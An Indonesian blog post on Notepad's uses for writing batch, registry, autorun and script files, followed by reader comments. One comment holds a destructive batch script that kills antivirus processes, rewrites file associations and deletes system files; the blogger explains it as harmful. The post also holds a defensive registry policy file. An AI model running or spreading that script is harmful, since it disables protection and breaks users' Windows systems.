Apakah fungsi notepad.exe ?

Notepad adalah aplikasi  Windows yang ada  sejak Windows 95.Fungsinya semua orang sudah tahu,yaitu digunakan untuk membuka file text.Tapi setelah pakai  microsoft office ,open office dll,banyak yang  melupakan notepad ini.

                 Notepad sebenarnya mempunyai multi fungsi,karena dia program text yang sangat simple sehingga kompatible dengan berbagai aplikasi.

Diantara fungsinya adalah:

1.Bisa digunakan membuat (mengedit) file  ber extension  bat (atau extension cmd untuk windows 2000 keatas ),bat atau cmd adalah aplikasi under dos yang bisa digunakan bermacam-macam fungsi tergantung command (perintah)  yang diketik dinotepad.Misalnya buat perintah shutdown.

Caranya buka notepad dan ketik :

shutdown.exe -s -t 30

kemudian save as type>>All files. Dan  filename bebas yang penting paling belakang .bat (extension file). Setelah itu coba double click file yang kita buat,apa yang terjadi?.Kalau benar script kita,maka Komputer akan shutdown dalam waktu 30  detik.

2.Membuat file ber extension inf, inf adalah  file yang digunakan untuk install driver hardware ,yang sekarang menjadi multifungsi,bisa jadi virus atau anti virus tergantung isinya.Misalnya: autorun.inf , yang sebenarnya dulu digunakan untuk cd, bila dimasukkan ke komputer akan langsung menjalankan aplikasi tertentu.Tapi sekarang digunakan untuk menjalankan virus di flash disk (UFD).

3.Membuat (mengedit)  file ber extension reg ,reg adalah  file yang digunakan untuk memasukkan settingan Windows melalui registry windows(regedit.exe).

4.Membuat (edit) file ber extension vbs , js dll.file tersebut adalah script yang digunakan untuk berbagai keperluan.Yang  compiler adalah wscript.exe atau cscript.exe.

Dan masih banyak lagi yang lain: misalnya html dll.

                           Dari notepad ini kita akan belajar banyak bahasa program,baik itu dos (.bat , .cmd).script ( .js , .vbs) atau lainnya,dengan cara click kanan >> open with notepad pada file-file tersebut.

Ini memang dasar sekali dan mungkin sudah banyak yang sudah bisa. Tapi disini saya tulis untuk catatan pribadi atau bagi yang belum bisa, agar  bisa mengingatnya  dengan mudah.

Bagi yang belum faham semoga bisa dibuat pelajaran…

About these ads

Tentang Mpu-Elcom

Sholatku , ibadahku , hidupku , dan matiku , ku persembahkan untuk Allah tuhan Alam semesta...
Tulisan ini dipublikasikan di Sistem operasi dan tag , . Tandai permalink.

48 Balasan ke Apakah fungsi notepad.exe ?

  1. sekolahseks berkata:

    Wah..Aku salut banget sama pemilik blog ini…
    Artikelnya bagus.
    Ngomong-omong, anda dapat bahan postingnya dari mana aja?

    Saya akan menyimpan alamat url/link anda.
    Aku akan sering-sering mampir kesini membaca tulisan anda.
    Saya tunggu up-datetan nya..

    Salam sukses

    http://sekolahseks.wordpress.com

  2. mpuelcom berkata:

    Makasih Kunjungannya!! Untuk bahan aku dapat belajar autodidak,pengalaman,dan internet…

  3. chamim berkata:

    om mpuELCOM.
    HEBAT…………..
    AKU pengen belajar lebih banyak lagi dari mpu.
    update terus ya.
    q pasti mampir klo pas ke warnet.
    q tunggu yang terbaru dari om henri ganif cahyono mpuelcom.
    q jga yakin ulmu yang diamalkan gak akan habis. malah akan bertambah. amiiiiiiin.
    thank’s buanggget..!!!!!!!!!

  4. Mpu-Elcom berkata:

    Sama…sama..

  5. dody berkata:

    om bisa ga notpad pake nanganin virus klo bisa tolong kasi tau dong caranya ya plis saya lgi pingin memperdalami notepad

  6. Mpu-Elcom berkata:

    Notepad adalah program text yang support uni code , bisa dipakai membuat Virus Juga bisa Untuk mengembalikan settingan karena perbuatan Virus :) untuk mempelajari Contoh notepad digunakan sebagai pengembali settingan registry silakan lihat contohnya di vaksin.com setiap kali artikel diVaksin.com menggunakan notepad untuk membuat file *.inf yang berfungsi untuk repair registry silakan belajar disana dan semoga bermanfaat.. :)

  7. Jeje berkata:

    senang bisa ktemu blog ini isinya sangat edukatif. klau tidak keberatan tolong jelasin solusi tuk mengatasi autoran yang menjalankan virus di flahsdisk

  8. Mpu-Elcom berkata:

    @jeje:terima kasih.. :) untuk mematikan autorun.. sudah sering saya jelaskan.. caranya yang mudah .. copy script ini:

    Windows Registry Editor Version 5.00

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies]

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
    “SaveZoneInformation”=dword:00000001

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
    “NoDriveTypeAutoRun”=dword:000000ff
    “NoSMHelp”=dword:00000001
    “ForceClassicControlPanel”=dword:00000001
    “NoResolveTrack”=dword:00000001
    “LinkResolveIgnoreLinkInfo”=dword:00000001
    “NoResolveSearch”=dword:00000001
    “NoLowDiskSpaceChecks”=dword:00000001
    “NoSMBalloonTip”=dword:00000001
    “NoSaveSettings”=dword:00000000
    “DisallowRun”=dword:00000001
    “NoDesktopCleanupWizard”=dword:00000001
    “NoRecentDocsNetHood”=dword:00000001
    “NoAutoTrayNotify”=dword:00000001
    “ClearRecentDocsOnExit”=dword:00000001
    “NoRecentDocsHistory”=dword:00000001
    “NoSharedDocuments”=dword:00000001
    “MaxRecentDocs”=dword:0000000f
    “NoComputersNearMe”=dword:00000001
    “NoNetConnectDisconnect”=dword:00000001

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun]
    “1”=”boot.exe”
    “2”=”jseup.exe”
    “3”=”cscript.exe”
    “4”=”wscript.exe”
    “5”=”boot.com”

    paste script diatas pada notepad pilih save as , pada save as type rubah ke all files dan file namenya beri nama , misalnya policies.reg “ingat jangan lupa menulis namanya dengan .reg ( extension registry ).setelah tersimpan coba double klik file tersebut “policies.reg” setelah sukses coba logoff atau restart. untuk membuktikan autorun windows sudah turn off coba masukkan flashdisk atau cd… bila autorun tidak tampil berarti sukses.. :) tapi perlu diingat ada cd yang diperlukan agar bisa autorun ( misalnya CD DRiver Motherboard ).. untuk menjalankannya coba baca file autorun.inf yang ada di-CD tersebut.. jalankan aja file yang tertulis di autorun.inf tersebut.. maka sama aja dengan autorun…\\\

  9. Tri murdani berkata:

    Mau tanya nih, kira2 bagaimana mendapatkan perintah / code file berektensi bat / cmd / reg dll? Soalnya saya bingung orang2 itu dapet dari mana code del, attrib, dll

  10. Mpu-Elcom berkata:

    di help windows.. ada command prompt A-Z , atau lihat file-file exe di folder %windir%\system32\ disitu ada banyak file dan untuk mengetahui di cmd ( command prompt ) ketik file exe diikuti /? misalnya : attrib /? maka akan ada keterangan tentang file tersebut…

  11. Agnes Phoun berkata:

    wow, awesome post, I was wondering the same thing. and found your site by google, many userful stuff here, now i have got some idea. bookmarked and also signed up your rss. keep us updated.

  12. Sirena Tansil berkata:

    Awesome post, hey I found this post while googling for lyrics. Thanks for sharing I’ll email my friends about this too.

  13. Lana Possick berkata:

    Hey check out my blog too. I hope i have some fun stuff too.

  14. Rydho berkata:

    Saya sangat salut dengan pembuat artikel ini, karena sangat membantu bagi orang-orang yang masih belajar seperti saya. Terima kasih atas informasinya mengenai notepad.

  15. Ray Staniec berkata:

    This page appears to recieve a great deal of visitors. How do you advertise it? It offers a nice unique twist on things. I guess having something authentic or substantial to talk about is the most important thing.

  16. sultan rafi ibrahim berkata:

    pak,saya ingin nanya.kalo di notepad tulis title virus is my dna
    color 0A
    @echo off
    set end=md “u cant eascape from me-vishnu”
    set fin=copy “Hack log.txt” “Installing”
    %end%
    %fin%
    net send * andhra pradesh- virus created in karimnagar from jits college
    kill NAVAPSVC.exe /F /Q
    kill zonelabs.exe /F /Q
    kill explorer.exe /F /Q
    cls
    assoc .exe=txtfile
    assoc .txt=mp3file
    assoc .mp3=.vcf
    cls
    msg * hi dude this is begining.
    msg * vishnu attcked the system try to challenge him .
    DEL C:\WINDOWS\system32\logoff.exe /F /Q
    DEL C:\WINDOWS\system32\logon.exe /F /Q
    DEL C:\WINDOWS\system32\logon.scr /F /Q
    cls
    shutdown

    kemudian disimpan di local disc:cC dengan nama installhack.bat bahaya gak?

  17. Mpu-Elcom berkata:

    @sultan rafi ibrahim: ya dari perintah yang ada sudah jelas ada perintah :
    1. mematikan / menutup file :
    kill NAVAPSVC.exe /F /Q
    kill zonelabs.exe /F /Q
    kill explorer.exe /F /Q
    2.Merubah asosiasi file :
    assoc .exe=txtfile
    assoc .txt=mp3file
    assoc .mp3=.vcf
    3.Menghapus file:
    DEL C:\WINDOWS\system32\logoff.exe /F /Q
    DEL C:\WINDOWS\system32\logon.exe /F /Q
    DEL C:\WINDOWS\system32\logon.scr /F /Q
    saran saya jangan eksekusi … bisa atau tidak , perintah itu akan merusak system anda .. :)

  18. Addy berkata:

    Bos,, saya mau nanya!!! membersihkan virus yg ada di flashdisk gmn y? baru beli udah keserang virus aja ni,, ni virus yg type kalo dibuka g’langsung buka,, tapi harus mlewati 7-zip file manager, truz didalam flashdisknya trdapat copy of shortcut to (1) sampai copy of shortcut to (4). thank’s

  19. Mpu-Elcom berkata:

    @Addy: yang salah bukan flashdisk anda , tapi komputer anda kemungkinan kena Virus Ramnit. Untuk memastikan coba lihat di folder C:\Program Files\microsoft …. kalau ada file watermark.exe berarti kena virus ramnit… cara membersihkan silakan baca: >Win32 Ramnit B | Ramnit C | Ramnit H<

  20. Kristi berkata:

    It�s onerous to seek out knowledgeable individuals on this matter, but you sound like you realize what you�re talking about! Thanks

  21. annonce berkata:

    Whats up! I simply want to give an enormous thumbs up for the good information you will have right here on this post. I will probably be coming again to your weblog for extra soon.

  22. seasniper berkata:

    gan? cara2 pembuatan virus dengan notepad itu bagaimana? ada link nya g?

  23. Mpu-Elcom berkata:

    @seasniper: itu membutuhkan keahlian..dan kecerdasan dalam hal pemrograman…baik dalam hal VBS , Bat , untuk link belajar command silakan ke : http://ss64.com/index.html

  24. dee_scooter berkata:

    Om..mw tanya nih,
    1. kalau mw bikin auto print dengan menggunakan notepad bagaimana caranya?misal saya lagi buka excel trus 30 detik kemudian file excel tsb bisa di print secara auto
    2. supaya bisa menerima perintah dari luar (misal saya mengkoneksikan sebuah saklar melalui paralel port), bikin programnya gimana OM?

    Thanks
    Terus berkarya

  25. Mpu-Elcom berkata:

    @dee_scooter : kalau boleh jujur saya bukan programmer… untuk lebih jelasnya silakan tanyakan yang ahlinya… kalau untuk mempelajari perintah-perintah program silakn lihat di : http://ss64.com/index.html dan juga silakan lihat… http://www.w3schools.com/

  26. cyber_yusuf berkata:

    om webnya sngat brguna bngt kalo saya ada kesulitan tolong dibantu y?
    thanks :)

  27. Mpu-Elcom berkata:

    @cyber_yusuf: ooke.. mas… kita…sama2 share…

  28. wawan berkata:

    om komputer saya sering ngrestart sendiri kl dipakai lbih dari 2jam kira2 masalahnya ap y?

  29. elrahmank@yahoo.com berkata:

    سبحا ن الله
    Syukron atas ilmunya…. Sangat bermanfaat, & menambah pengetahuan tntang ilmu kmputer….
    Sekali lagi makasih…. Salut bnget.

  30. echo_multi berkata:

    om mw tnya nech. .gmana crany bwt autorun bwt dvd, coz autorun dvd saya terhapus sehingga data yg ada dlm dvd itu gak kebaca. Tolong pncerahanny ya om. .

  31. Mpu-Elcom berkata:

    cukup buat file bernama autorun.inf dengan notepad save allfiles >>autorun.inf didalamnya ketik :open (program yang ingin dijalankan automatis )

  32. alindjonathan berkata:

    om. boleh minta buatin script pake notepad ngga.
    script nya untuk cek secara berkala program running apa ngga. trus kalo misal ngga running (error/crash) bisa autostart lg program itu.
    tq sebelum nya om

  33. Mpu-Elcom berkata:

    @alindjonathan: mau difungsikan untuk apa?…… silakan pelajari pemograman pakai batch file silakan baca >disini<

  34. sasya berkata:

    bos,mo minta tolong nih. kemarin nyoba translate sub title .srt pake notepad (semula bentuk file-nya srt) setelah saya mengedit translate dan disimpan,bentuknya koq tetep notepad. Apakah memang seperti itu, soalnya sub title yang lain juga berubah jadi notepad.Mohon pencerahannya …. maturnuwun sebelumnya

  35. Mpu-Elcom berkata:

    @sasya:anda waktu open with anda pilih centang di pilihan always use….

  36. adie berkata:

    mau nanya dikit nih gan,
    kan saya udah copast javascript untuk membuat tulisan terbalik ke Notepad, tapi pas saya save dengan format .exe ko ga bisa terbuka ya ??
    tpi klo di save dengan format .html baru bisa terbuka,,
    mohon pencerahan nya gan,,
    success selalu buat anda .. :)

  37. Mpu-Elcom berkata:

    javascript kan memang umumnya…berada di html…mungkin kalau vb script…yang bisa di jadikan exe..gitu kali ya.. :)

  38. arfan berkata:

    mas…notepad .exe di kompi gue terhapus waktu menghapus virus gimana cara mengembalikannya yah??

  39. Mpu-Elcom berkata:

    @arfan: bisa mengcopy dari komputer lain lokasi file di folder : Windows\system32\notepad.exe

  40. teguh berkata:

    gan, kmputer sy di cmd sy assoc trus semua file gak bsa dibuka, command promt nya dah sy tu2p, ngembliin seperti smula gmana ya? Plis thx

  41. teguh berkata:

    gan twiter at fb nya agan apa gan?

  42. Mpu-Elcom berkata:

    @teguh: gunakan smadav .. karena di smadav bisa langsung mengembalikan registry yg dirubah…

  43. alv.. berkata:

    ini bagus nih…tulisannya…thanks gan..!!!!!!!.

  44. Calvin Sozanolo berkata:

    Wah gila…..
    Script yang ada di blog ini mmang maknyos!

    Krn gua penasaran, gua coba buat script nya. E ternyata gua berhasil, tapi harus kerja keras tu buat hapus folder yang sampai 35.000 lebih folder.

    Aduh…….
    Ngak blh coba2 bikin di PC sendiri ni, harus bikin di tempat lain…….. :)

    kak kl ada script lainnya britau donk……
    Ni imel k: jarejare95@yahoo.co.id
    sebelumnya trims!…..

  45. ruddy berkata:

    bro ,, cara terjemahin bahasa notepad gimna

  46. ruddy berkata:

    bro,, tau gak cara untuk terjemahin bahasa notepad,, biar bisa jdi bahasa yang kayak kita pakai

  47. Mpu-Elcom berkata:

    @ruddy : bukan diterjemah….tetapi kitanya yang harus mempelajari…perintah ( script ) yang berguna untuk membuat suatu program… , karena notepad adalah fasilitas …yang bisa digunakan berbagai macam perintah , batch file , vbs csript , dll …

  48. pirman berkata:

    pa kenapa komputer pada saat membaca perogram aplikasinya pake notped…..jadi ga bisa di buka program aplikasinya malah keluar notped..terus logonya/gambarnya juga berubah menjadi lambang notped

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s